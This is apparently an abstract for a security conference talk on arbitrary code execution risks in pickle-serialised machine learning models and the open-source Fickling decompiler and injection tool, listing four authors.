Machine learning models are often stored as Python pickle files because they conserve memory, enable start-and-stop model training, and can be easily shared. However, pickle files are vulnerable to arbitrary code execution attacks when they are deserialized from an untrusted source. This talk covers our research on model-sharing services like PyTorch Hub and introduces Fickling, our open-source decompiler and code-injection tool. Fickling allows penetration testers and red teamers to create malicious model files that can attack machine learning frameworks like PyTorch and SpaCy. We will demonstrate the wide variety of attacks made possible by the inherently vulnerable design of pickle files.
Resources
Presented at
Authored by
- Carson Harmon, Evan Sultanik, Jim Miller, Suha Hussain